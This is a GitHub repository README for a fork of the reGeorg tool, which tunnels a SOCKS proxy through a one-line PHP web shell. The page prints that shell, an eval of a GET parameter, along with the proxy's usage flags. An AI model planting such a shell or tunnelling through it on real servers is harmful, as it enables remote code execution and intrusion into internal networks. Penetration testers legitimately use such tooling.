Skip to content
forked from sensepost/reGeorg

A modified reGeorg for One-line PHP Shell.

License

Unknown, Unknown licenses found

Licenses found

Unknown
LICENSE.html
Unknown
LICENSE.txt
Notifications You must be signed in to change notification settings

zsxsoft/reGeorg

 
 

Repository files navigation

reGeorg for PHP One-line Shell

  _____   ______  __|___  |__  ______  _____  _____   ______
 |     | |   ___||   ___|    ||   ___|/     \|     | |   ___|
 |     \ |   ___||   |  |    ||   ___||     ||     \ |   |  |
 |__|\__\|______||______|  __||______|\_____/|__|\__\|______|
                    |_____|
                    ... every office needs a tool like Georg

[email protected] / @_w_m__

[email protected] / @trowalts

[email protected] / @kamp_staaldraad

[email protected] / [@zsxsoft]

What's this?

A modified reGeorg for One-line PHP Shell like this:

<?php eval($_GET['a']); ?>

Version

1.0

Dependencies

reGeorg requires Python 2.7 and the following modules:

  • urllib3 - HTTP library with thread-safe connection pooling, file post, and more.

Usage

$ reGeorgSocksProxy.py [-h] [-l] [-p] [-r] -u -k [-v] 

Socks server for reGeorg HTTP(s) tunneller

optional arguments:
  -h, --help           show this help message and exit
  -l , --listen-on     The default listening address
  -p , --listen-port   The default listening port
  -r , --read-buff     Local read buffer, max data to be sent per POST
  -u , --url           The url containing the tunnel script
  -k , --key           The GET paramter
  -v , --verbose       Verbose output[INFO|DEBUG]

Example
---------
$ python reGeorgSocksProxy.py -p 8080 -u http:https://127.0.0.1/shell.php -k a

License

MIT

About

A modified reGeorg for One-line PHP Shell.

Resources

License

Unknown, Unknown licenses found

Licenses found

Unknown
LICENSE.html
Unknown
LICENSE.txt

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Python 56.0%
  • PHP 44.0%